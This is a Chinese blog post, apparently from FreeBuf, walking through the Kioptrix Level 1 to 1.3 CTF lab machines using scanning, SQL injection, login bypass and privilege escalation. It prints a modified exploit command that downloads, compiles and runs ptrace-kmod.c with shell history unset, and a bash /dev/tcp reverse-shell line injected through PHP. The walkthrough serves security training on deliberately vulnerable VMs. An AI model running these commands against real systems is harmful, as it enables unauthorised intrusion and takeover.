freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CTF靶场系列-Kioptrix全集
2019-03-09 16:57:23
所属地 广东省

下载地址

#Kioptrix: Level 1 (#1)

https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 

#Kioptrix: Level 1.1 (#2)

https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar

#Kioptrix: Level 1.2 (#3)

https://download.vulnhub.com/kioptrix/KVM3.rar
#Kioptrix: Level 1.3 (#4)
https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar

实战演练

Kioptrix_Level_1

查找该靶机的IP为192.168.199.230
image.png扫描端口
image.pngnikto扫到了不起的东西
image.pngimage.png试试这两个exp
image.png编译报错
image.png安装这个
image.png发现还是报错,查了一下
在764.c里面加入下面几句
#include <openssl/rc4.h>
#include <openssl/md5.h>

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16


就可以编译成功
这个站好像死了,我们换另外一个网站的
image.png位置在这里624行,修改成下面
#define COMMAND2 “unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n”

image.pngOK,搞定了
image.png

Kioptrix_Level_1.1

扫描网段,找到IP为192.168.199.170

image.png80端口打开,看看有没有东西

image.png有登录框使用万能密码登录一下

image.png

sqlmap跑了一下,有注入,不过后面有命令执行,就忽略

image.png

看到这样的套路,就知道有命令执行漏洞
image.pngimage.png内核版本
image.png
使用nc监听1234端口,然后在PHP执行下面命令
;bash -i >& /dev/tcp/192.168.199.176/1234 0>&1
image.pngimage.png
提权
image.pngimage.png提权成功

Kioptrix_Level_1.2

找到靶机的IP是192.168.199.218
image.pngimage.pngimage.pngimage.pngweb系统要做host
image.pngimage.png在web扫了一波注入,找到了这个注入点
image.png数据库
image.pngimage.pngimage.png找到了一些信息
image.png
使用这两个账号能够登录进ssh
image.png按F3,进入到这个文件进行修改,然后按F2保存
image.png搞定
image.png

kioptrix_level 1.3

压缩包解压后,发现只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘
image.png把原来的硬盘删掉,添加这块硬盘
image.png增加成功
image.png扫描到靶机的IP是192.168.199.100
image.pngimage.pngimage.png
找到了几个用户
image.png扫描web目录
image.png进入到web系统,发现有登录框,测试发现使用上面扫描到用户,可以爆出来用户密码
image.png
image.png使用ssh登录进去
image.pngimage.png使用mysql提权
image.png
# CTF # 靶机环境
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者